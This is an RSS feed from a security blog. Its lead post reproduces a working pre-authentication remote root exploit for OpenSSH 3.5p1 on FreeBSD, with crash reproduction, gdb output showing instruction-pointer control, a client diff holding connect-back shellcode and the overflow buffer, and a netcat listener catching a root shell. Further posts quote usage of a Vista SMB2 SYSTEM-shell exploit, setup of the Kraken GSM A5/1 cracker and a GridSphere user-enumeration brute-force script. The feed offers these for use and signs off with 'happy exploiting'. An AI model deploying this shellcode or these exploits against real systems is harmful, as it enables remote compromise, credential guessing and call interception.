<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT Security &#187; News</title>
	<atom:link href="http://ipsecs.com/web/?cat=1&#038;feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://ipsecs.com/web</link>
	<description>Who Owns Who Now?</description>
	<lastBuildDate>Fri, 24 May 2013 02:06:36 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>OpenSSH 3.5p1 Remote Root Exploit for FreeBSD</title>
		<link>http://ipsecs.com/web/?p=245</link>
		<comments>http://ipsecs.com/web/?p=245#comments</comments>
		<pubDate>Fri, 01 Jul 2011 06:44:45 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[remote exploit]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=245</guid>
		<description><![CDATA[OpenSSH 3.5p1 Remote Root Exploit for FreeBSD Discovered and Exploited By Kingcope &#8211; 2011 The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the default install.Â  The sshd banner for 4.11-RELEASE is: "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930". A working Remote Exploit [...]]]></description>
				<content:encoded><![CDATA[<p><strong>OpenSSH 3.5p1 Remote Root Exploit for FreeBSD<br />
Discovered and Exploited By Kingcope &#8211; 2011</strong></p>
<p>The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the default install.Â  The sshd banner for 4.11-RELEASE is:<br />
<code>"SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".</code></p>
<p>A working Remote Exploit which spawns a root shell remotely and previous to authentication was developed.Â  The bug can be triggered both through ssh version 1 and ssh version 2 using a modified ssh client. During the investigation of the vulnerability it was found that the bug resides in the source code file &#8220;auth2-pam-freebsd.c&#8221;.</p>
<p>http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c</p>
<p>This file does not exist in FreeBSD releases greater than 5.2.1. The last commit is from 7 years ago.Â  Specifically the bug follows a code path in the PAM Authentication Thread inside this source code, &#8220;pam_thread()&#8221;. It could not be verified if the bug is inside this<br />
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.</p>
<p>Both the challenge response (ssh version 1) and keyboard interactive via pam (ssh version 2) authentications go through this code path.Â  By supplying a long username to the daemon the sshd crashes.</p>
<p><code>h4x# sysctl kern.sugid_coredump=1<br />
kern.sugid_coredump: 0 -&gt; 1<br />
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138<br />
h4x# tail -1 /var/log/messages<br />
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)</code></p>
<p>Looking into the coredump reveals:</p>
<p><code>h4x# gdb -c /sshd.core<br />
GNU gdb 4.18 (FreeBSD)<br />
Copyright 1998 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB.Â  Type "show warranty" for details.<br />
This GDB was configured as "i386-unknown-freebsd".<br />
Core was generated by `sshd'.<br />
Program terminated with signal 11, Segmentation fault.<br />
#0Â  0x28092305 in ?? ()<br />
(gdb) x/1i $eip<br />
0x28092305:Â Â Â Â  (bad) </code></p>
<p>The sshd crahes at a place with illegal instructions. It looks like it depends on how the sshd is started. Starting the sshd from the console as root and running the ssh client with long username again reveals:<span id="more-245"></span></p>
<p><code>h4x# killall -9 sshd<br />
h4x# /usr/sbin/sshd<br />
root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138<br />
h4x# gdb -c /sshd.core<br />
GNU gdb 4.18 (FreeBSD)<br />
Copyright 1998 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB.Â  Type "show warranty" for details.<br />
This GDB was configured as "i386-unknown-freebsd".<br />
Core was generated by `sshd'.<br />
Program terminated with signal 11, Segmentation fault.<br />
#0Â  0x41414141 in ?? ()<br />
(gdb) x/10i $eip<br />
0x41414141:Â Â Â Â  Cannot access memory at address 0x41414141.</code></p>
<p>As you can see in the above gdb output we can control EIP completely. If someone finds out on what this behaviour depends, especially why EIP can be controlled when starting sshd in the console and can not be easily controlled when being run from the boot sequence, please drop me an email at isowarez.isowarez.isowarez (at) googlemail.com</p>
<p>Anyhow this procedure shows that the sshd can be exploited because the instruction pointer can be fully controlled.Â  The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client. Using a reverse shellcode it will spawn a rootshell.Â  Only one offset is needed, the position of the shellcode can be found the following way:</p>
<p><code>h4x# gdb -c /sshd.core<br />
GNU gdb 4.18 (FreeBSD)<br />
Copyright 1998 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you are<br />
welcome to change it and/or distribute copies of it under certain conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB.Â  Type "show warranty" for details.<br />
This GDB was configured as "i386-unknown-freebsd".<br />
Core was generated by `sshd'.<br />
Program terminated with signal 11, Segmentation fault.<br />
#0Â  0x41414141 in ?? ()<br />
(gdb) set $x=0x08071000<br />
(gdb) while(*++$x!=0x90909090)<br />
&gt;end<br />
(gdb) x/10b $x</code></p>
<p>The printed address is the beginning of the shellcode nopsled.Â  Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.Â  It roughly does the following:</p>
<p><code>root@debian:~# ./ssh -1 192.168.32.138<br />
root@debian:~# nc -v -l -p 10000<br />
listening on [any] 10000 ...<br />
192.168.32.138: inverse host lookup failed: Unknown host<br />
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038<br />
uname -a;id;<br />
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005Â Â Â Â  root (at) perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERICÂ  i386<br />
uid=0(root) gid=0(wheel) groups=0(wheel) </code></p>
<p><code>root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c<br />
667a668,717<br />
&gt; // Connect Back Shellcode<br />
&gt;<br />
&gt; #defineÂ Â Â Â Â Â  IPADDRÂ  "\xc0\xa8\x20\x80"<br />
&gt; #define PORTÂ  "\x27\x10"Â Â Â Â Â Â Â Â Â Â Â Â Â  /* htons(10000) */<br />
&gt;<br />
&gt; char sc[] =<br />
&gt;Â Â Â  "\x90\x90"<br />
&gt;Â Â Â  "\x90\x90"<br />
&gt;Â Â Â  "\x31\xc9"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // xorÂ Â Â  ecx, ecx<br />
&gt;Â Â Â  "\xf7\xe1"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // mulÂ Â Â  ecx<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x41"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // incÂ Â Â  ecx<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x41"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // incÂ Â Â  ecx<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\xb0\x61"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  al, 97<br />
&gt;Â Â Â  "\xcd\x80"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // intÂ Â Â  80h<br />
&gt;Â Â Â  "\x89\xc3"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  ebx, eax<br />
&gt;Â Â Â  "\x68"IPADDRÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  dword 0101017fh<br />
&gt;Â Â Â  "\x66\x68"PORTÂ Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  word 4135<br />
&gt;Â Â Â  "\x66\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  cx<br />
&gt;Â Â Â  "\x89\xe6"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  esi, esp<br />
&gt;Â Â Â  "\xb2\x10"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  dl, 16<br />
&gt;Â Â Â  "\x52"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  edx<br />
&gt;Â Â Â  "\x56"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  esi<br />
&gt;Â Â Â  "\x50"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  eax<br />
&gt;Â Â Â  "\x50"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  eax<br />
&gt;Â Â Â  "\xb0\x62"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  al, 98<br />
&gt;Â Â Â  "\xcd\x80"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // intÂ Â Â  80h<br />
&gt;Â Â Â  "\x41"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // incÂ Â Â  ecx<br />
&gt;Â Â Â  "\xb0\x5a"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  al, 90<br />
&gt;Â Â Â  "\x49"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // decÂ Â Â  ecx<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x53"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ebx<br />
&gt;Â Â Â  "\x53"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ebx<br />
&gt;Â Â Â  "\xcd\x80"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // intÂ Â Â  80h<br />
&gt;Â Â Â  "\x41"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // incÂ Â Â  ecx<br />
&gt;Â Â Â  "\xe2\xf5"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // loopÂ Â  -10<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x68\x2f\x2f\x73\x68"Â Â Â Â  // pushÂ Â  dword 68732f2fh<br />
&gt;Â Â Â  "\x68\x2f\x62\x69\x6e"Â Â Â Â  // pushÂ Â  dword 6e69622fh<br />
&gt;Â Â Â  "\x89\xe3"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // movÂ Â Â  ebx, esp<br />
&gt;Â Â Â  "\x51"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ecx<br />
&gt;Â Â Â  "\x54"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  esp<br />
&gt;Â Â Â  "\x53"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ebx<br />
&gt;Â Â Â  "\x53"Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // pushÂ Â  ebx<br />
&gt;Â Â Â  "\xb0\xc4\x34\xff"<br />
&gt;Â Â Â  "\xcd\x80";Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  // intÂ Â Â  80h<br />
&gt;<br />
679a730,737<br />
&gt;Â Â Â Â Â Â  char buffer[8096];<br />
&gt;<br />
&gt;Â Â Â Â Â Â  // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1<br />
&gt;Â Â Â Â Â Â  memcpy(buffer, "AAAA\x58\xd8\x07\x08""CCCCDDDDEEEE\xd8\xd8\x07\x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);<br />
&gt;Â Â Â Â Â Â  memset(buffer+24, '\x90', 5000);<br />
&gt;Â Â Â Â Â Â  memcpy(buffer+24+5000, sc, sizeof(sc));<br />
&gt;Â Â Â Â Â Â  server_user=buffer;<br />
&gt;<br />
690a749<br />
&gt;</code></p>
<p>Download the SSH client patch <a href="http://www.exploit-db.com/download/17462">here</a>. Cheers</p>
<p>Kingcope</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=245</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Remote SMB Exploit for Vista SP1/SP2</title>
		<link>http://ipsecs.com/web/?p=216</link>
		<comments>http://ipsecs.com/web/?p=216#comments</comments>
		<pubDate>Fri, 20 Aug 2010 16:38:50 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[remote exploit]]></category>
		<category><![CDATA[Vista]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=216</guid>
		<description><![CDATA[It has been while story about SMB version 2 vulnerability since this post. Finally public exploit to take over control windows vista SP1 and SP2 are out! You can catch the exploit at exploit-db. Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference --------------------------------------------------------------------- Exploited by Piotr Bania // www.piotrbania.com Exploit for Vista SP2/SP1 only, should [...]]]></description>
				<content:encoded><![CDATA[<p>It has been while story about SMB version 2 vulnerability since <a href="http://ipsecs.com/web/?p=127">this post</a>. Finally public exploit to take over control windows vista SP1 and SP2 are out! You can catch the exploit at <a href="http://www.exploit-db.com/exploits/14674/">exploit-db</a>.</p>
<blockquote><pre>Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
---------------------------------------------------------------------

Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!

Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)

Kudos for:
Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.
Special kudos for prdelka for testing this shit and all the hosters.

Sample usage
------------

&gt; smb2_exploit.exe 192.167.0.5 45 0
&gt; telnet 192.167.0.5 28876

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
whoami
nt authority\system
C:\Windows\system32&gt;

When all is done it should spawn a port TARGET_IP:28876

RELEASE UPDATE 08/2010:
----------------------
This exploit was created almost a year ago and wasnt modified from that time
whatsoever. The vulnerability itself is patched for a long time already so
i have decided to release this little exploit. You use it for your own
responsibility and im not responsible for any potential damage this thing
can cause. Finally i don't care whether it worked for you or not.

P.S the technique itself is described here:

http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html

===========================================================================
Download:

http://www.exploit-db.com/sploits/smb2_exploit_release.zip</pre>
</blockquote>
<p>For your information, two days later at 19th August 2010, Kingcope released root exploit for FreeBSD 8.x and 7.x by poisoning mbufs() function. You may download Kingcope&#8217;s exploit <a href="http://www.exploit-db.com/exploits/14688/">here</a>. Now happy exploiting while waiting &#8220;SAHUR&#8221; guys!</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=216</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Grid Toolkit &#8211; Grid Computing Hacker Kit</title>
		<link>http://ipsecs.com/web/?p=205</link>
		<comments>http://ipsecs.com/web/?p=205#comments</comments>
		<pubDate>Sat, 07 Aug 2010 07:12:51 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Grid Hacking]]></category>
		<category><![CDATA[Hacking]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=205</guid>
		<description><![CDATA[Just like what we promised before, this time we want to release grid toolkit which usable to perform pentest against grid computing infrastructure. It&#8217;s almost two years after we release paper related to grid computing [in]security at 2008. The paper contains of: Introduction to grid computing Grid computing scanning and enumeration Exploiting network and transport [...]]]></description>
				<content:encoded><![CDATA[<p>Just like what we promised before, this time we want to release grid toolkit which usable to perform pentest against grid computing infrastructure. It&#8217;s almost two years after we release paper related to grid computing [in]security at 2008. <a href="http://core.ipsecs.com/paper/0x02-grid-insecurity.txt">The paper</a> contains of:</p>
<ul>
<li>Introduction to grid computing</li>
<li>Grid computing scanning and enumeration</li>
<li>Exploiting network and transport layer related to grid security</li>
<li>Exploiting DNS to stop grid infrastructure trusteeship</li>
<li>Exploiting web based &#8211; grid computing portal</li>
<li>Cracking certificate authority pass phrase</li>
<li>Exploiting headnode trusteeship using XML file</li>
</ul>
<p>Some points mentioned can be exploited using existing network security tool while others are already supported by Grid Toolkit. Grid Toolkit uses python with some additional module which must be installed. The additional python module are:</p>
<ul>
<li>Module goto to support grid toolkit core program</li>
<li>Module ClientForm to support grid portal guessing</li>
<li>Module Paramiko to support certificate authority cracking</li>
</ul>
<p>Grid toolkit supports to:</p>
<ul>
<li>Scanning and enumeration grid infrastructure</li>
<li>Guessing login gridsphere &#8211; web based grid portal</li>
<li>Cracking pass phrase of certificate authority private key file</li>
<li>Exploiting headnode trusteeship using XML file</li>
</ul>
<p>More reference about how to install and use this tool will be available soon, so just keep in touch with IPSECS. Finally you can download grid toolkit on <a href="http://gridtoolkit.sourceforge.net/">gridtoolkit.sourceforge.net</a> or reading python source code on <a href="http://core.ipsecs.com/grid-toolkit/grid-toolkit/">core.ipsecs.com</a>!</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=205</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kraken &#8211; GSM A5 Cracking</title>
		<link>http://ipsecs.com/web/?p=200</link>
		<comments>http://ipsecs.com/web/?p=200#comments</comments>
		<pubDate>Mon, 26 Jul 2010 12:35:28 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[A5]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[GSM]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=200</guid>
		<description><![CDATA[GSM A5 Cracking topic is started to be public material since The Hacker Choice disclosed their research. Many open source materials related to GSM are released to the public on Osmocomm. Now, tool called Kraken is freely distributed on internet to crack GSM A5. I am pleased to announce the first release of a A5/1 [...]]]></description>
				<content:encoded><![CDATA[<p>GSM A5 Cracking topic is started to be public material since <a href="http://freeworld.thc.org/news.php?s=9&amp;q=">The Hacker Choice</a> disclosed their research. Many open source materials related to GSM are released to the public on <a href="http://bb.osmocom.org/trac/">Osmocomm</a>. Now, tool called <em><strong>Kraken </strong></em>is freely distributed on internet to crack GSM A5.</p>
<blockquote>
<pre>I am pleased to announce the first release of a A5/1 cracker capable
using the full Berlin set of rainbow tables for lookups. I have named
this beast Kraken, after a Norse mythological creature capable of eating
many things for breakfast. Kraken feeds of an exclusive diet of A5/1
encrypted data.

Currently only a bare bone functionality is present, but the UI will be
improved, with the specific goal of providing an easy to use tool for
cracking GSM intercepts. But setting up this Leviathan can a bit
cumbersome, so I will give a short howto here:

Prerequisites:

* Linux machine, multicore min 3GB RAM
* 1.7 - 2TB of HD partitions without filsystem ( ex Samsung spinpoint F3s,
  with 4k aligned start of partition )
* The Berlin A5/1 Rainbow table set
* GPU support will be added for ATI Radeon HD

Setup:

Find out how many tables you want on each partition, (usually roughly
equal on each) and make the initial configuration file. An example
configuration folder can be found in tinkering/A5Util/indexes. This
folder should contain a tables.conf file. The example files shows a
setup of 4 disk having 10 tables each. The index files for the various
tables will be added to the index folder as they are written to disk.
The first section of the config file needs to be set up with the list of
available partitions, and the number of tables that each partition
should hold. A single table needs 42GB of space. (Do NOT change the
order of this section)

For safety reasons it is best not to build the tables running as root.
The you will then have to make your table partitions user accessible.
Add a file such as 10-disk.rules in /etc/udev/rules.d with one line for
each partition:

KERNEL=="sda1", OWNER="frank"

Then manually change the ownership of the device nodes with chown. Take
care when doing this, as you do not want to nuke any of your system
partitions.

Add tables to your disk array:

First build and make a symlink from your index folder to the
TableConvert tool. It is assumed that the Berlin tables are available in
either SSD or index free delta format. The python script Behemoth.py
will recursively search for tables, and add them to the disk array and
configuration file as needed. (Duplicates will not be added) - This
operation(s) will take some hours to complete, but when done you should
end up with a tables.conf file listing ~40 tables, their advance
parameter (id), which device they reside on, and a block offset into the
device.

Build and fire up Kraken:

./kraken path_to_index_folder

Currently it will only load up all tables, and crack TDMA burst 998 for
the challenge data. This takes 1.5 minutes on a 4 core Phenom II using
only CPU power, and the output should look like:

Cracking
0011011100110000000010000011000110001001101101100110110100111100011010
10100100101111111010111100000110101001101011
Found de6bb5e60617f95c @ 12
Found 6fb7905579e28bfc @ 23

A more interactive UI with appropriate data formats (representations)
will be added for easy interfacing with airprobe. Optional GPU support
will also be added for faster cracking time.

cheers,
Frank

<strong>Source </strong>: http://lists.lists.reflextor.com/pipermail/a51/2010-July/000683.html</pre>
</blockquote>
<p>Well the article form <a href="http://www.computerworld.com/s/article/9179529/New_Kraken_GSM_cracking_software_is_released?taxonomyId=15&amp;pageNumber=1">http://computerworld.com</a> is really nice to read!<span id="more-200"></span></p>
<blockquote><p>The GSM technology used by the majority of the  world&#8217;s mobile phones will get some scrutiny at next week&#8217;s Black Hat  security conference, and what the security researchers there have to say  isn&#8217;t pretty.</p>
<p>On Friday, an open source effort  to develop GSM-cracking software <a href="http://lists.lists.reflextor.com/pipermail/a51/2010-July/000683.html" target="_blank">released software</a> that cracks the A5/1 encryption  algorithm used by some GSM networks. Called Kraken, this software uses  new, very efficient, encryption cracking tables that allow it to break  A5/1 encryption much faster than before.</p>
<p>The  software is key step toward eavesdropping on mobile phone conversations  over GSM networks. Since GSM networks are the backbone of 3G, they also  provide attackers with an avenue into the new generation of handsets.</p>
<p>In December, the group released a set of encryption  tables designed to speed up the arduous process of breaking A5/1  encryption, but the software component was incomplete. Now the software  is done, and the tables are much more efficient than they were seven  months ago. &#8220;The speed of how fast you could crack a call is probably  orders of magnitude better than anything previously,&#8221; said Frank  Stevenson, a developer with the A5/1 Security Project. &#8220;We know we can  do it in minutes; the question is, can we do it in seconds?&#8221;</p>
<p>As the software becomes more polished it will make GSM  call eavesdropping practical. &#8220;Our attack is so easy to carry out, and  the cost of attack is lowered so significantly, that there is now a real  danger of widespread intercepting of calls,&#8221; Stevenson said.</p>
<p>Stevenson and his co-developers haven&#8217;t put together  all the components someone would need to listen in on a call &#8212; that  would be illegal in some countries. Someone must still develop the radio  listening equipment needed to gain access to the GSM signal, but that  type of technology is within reach. Stevenson believes that this could  be done using an inexpensive mobile phone and  a modified version of  open-source software called <a href="http://bb.osmocom.org/trac/" target="_blank">OsmocomBB</a>. Hackers could also use a more-expensive  Universal Software Radio Peripheral (USRP) device in conjunction with  another program, called <a href="https://svn.berlin.ccc.de/projects/airprobe/wiki" target="_blank">Airprobe.</a></p>
<p>A5/1 Security Project leader Karsten Nohl   will <a href="https://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Nohl" target="_blank">discuss</a> the hardware and software setup for his  project&#8217;s GSM cracking tools at next week&#8217;s conference.</p>
<p>Last year there were about 3.5 billion GSM phones in  use, according to <a href="http://www.gsmworld.com/newsroom/market-data/market_data_summary.htm" target="_blank">data</a> from the GSM Association. Not all of these  phones are on networks that use A5/1 encryption &#8212; some use the  more-secure A5/3 algorithm; others use no encryption &#8212; but a sizeable  percentage are.</p>
<p>In the U.S., both AT&amp;T and  T-Mobile operate GSM networks.</p>
<p>The trade group  that represents GSM network operators and equipment manufacturers, the  GSM Association, has said in the past that A5/1 cracking efforts such as  this are interesting, but attacks are extremely difficult to pull off  in the real world. Intercepting mobile phone calls is illegal in many  countries, including the U.S. The GSM Association did not respond to  messages seeking comment for this story.</p>
<p>Project  developers say the point of their work is to show how easy it really  would be to crack A/51 &#8212; something they say that grey market commercial  products are already doing. According to Stevenson many of these  security problems are solved in next-generation mobile network  technologies such as 3G and LTE (Long Term Evolution).</p>
<p>However, even 3G phones can be compromised because  they can roll back to GSM mode when a 3G network is not available. &#8220;You  can choose to operate in 3G mode only, but then you will have very  limited coverage,&#8221; Stevenson said. &#8220;GSM has become the Achilles Heel of  3G security.&#8221;</p>
<p>Meanwhile, another Black Hat  presenter, Chris Paget plans to demonstrate a completely different way  to intercept GSM calls. He&#8217;s setting up a fake cellular tower that  masquerades as a legitimate GSM network.</p>
<p>According  to Paget, using open-source tools and a US$1,500 USRP radio, he can  assemble his fake tower, called an IMSI (International Mobile Subscriber  Identity) catcher. In a controlled experiment, he&#8217;s going to set one up  at Black Hat and invite audience members to connect their mobile  phones. Once a phone has connected, Paget&#8217;s tower tells it to drop  encryption, giving him a way of listening in on calls.</p>
<p>&#8220;I think there&#8217;s been too much focus on the  cryptographic weaknesses in GSM,&#8221; he said. &#8220;People need to recognize  that the cryptographic weaknesses are not the worst weaknesses in GSM. &#8220;</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=200</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GridSphere Remote User Enumeration</title>
		<link>http://ipsecs.com/web/?p=178</link>
		<comments>http://ipsecs.com/web/?p=178#comments</comments>
		<pubDate>Sun, 20 Jun 2010 17:11:34 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Grid Computing]]></category>
		<category><![CDATA[Grid Hacking]]></category>
		<category><![CDATA[Grid Security]]></category>

		<guid isPermaLink="false">http://ipsecs.com/web/?p=178</guid>
		<description><![CDATA[GridSphere is web based portal framework to access grid computing resources. The GridSphere provides an open-source portlet based Web portal. GridSphere enables developers to quickly develop and package third-party portlet web applications that can be run and administered within the GridSphere portlet container. GridSphere which is critically uses to access grid resource is found to [...]]]></description>
				<content:encoded><![CDATA[<p>GridSphere is web based portal framework to access grid computing resources. The GridSphere provides an open-source portlet based  Web portal.  GridSphere enables developers to quickly develop and  package  third-party portlet  web applications that can be run and administered within the GridSphere  portlet container.</p>
<p>GridSphere which is critically uses to access grid resource is found to be vulnerable that can be exploited to enumerate a user is valid or not in grid. This vulnerability exist due to the response of gridsphere in handling in-exist user with &#8220;<em>User does not exist</em>&#8220;. To exploit this issue, you can use <a href="http://core.ipsecs.com/grid-toolkit/python/gridsphere-brutepy.txt">this </a>python script.</p>
<p><code><em>python gridsphere-brute.py https://example.com/acgt/portal?cid=login users.txt</em></code></p>
<p><code><em>[INVALID] anto<br />
[INVALID] abc<br />
[INVALID] betha<br />
[INVALID] een<br />
[INVALID] nita<br />
[INVALID] aris<br />
[INVALID] atik<br />
[INVALID] babas<br />
[INVALID] alex<br />
[OK] admin<br />
[INVALID] fuck<br />
[INVALID] lisa<br />
[INVALID] ifa<br />
[INVALID] hana<br />
[INVALID] bram</em></code></p>
<p>IPSECS has developed some tools to assess grid computing security years ago which can be download <a href="http://stuff.ipsecs.com/files/grid-insecurity.txt">here</a>. The tools is encoded in ASCII and bundled with article which explains grid computing [in]security written in indonesian. The tools provided can be used to:</p>
<ul>
<li>Enumerate headnode by identifying GridFTP Service and Web Service Container</li>
<li>Crack private key in Certificate Authority</li>
<li>Exploit others headnode in grid when a headnode and its certificate compromised.</li>
</ul>
<p>For your information, currently IPSECS is developing grid-toolkit to make grid computing penetration much more easier.</p>
]]></content:encoded>
			<wfw:commentRss>http://ipsecs.com/web/?feed=rss2&#038;p=178</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IPv6 Hackit &#8211; The IPv6 Army Knife</title>
		<link>http://ipsecs.com/web/?p=166</link>
		<comments>http://ipsecs.com/web/?p=166#comments</comments>
		<pubDate>Mon, 24 May 2010 16:31:57 +0000</pubDate>
		<dc:creator>IPSECS Admin</dc:creator>
				<category><![CDATA[Exploitation]]></category>
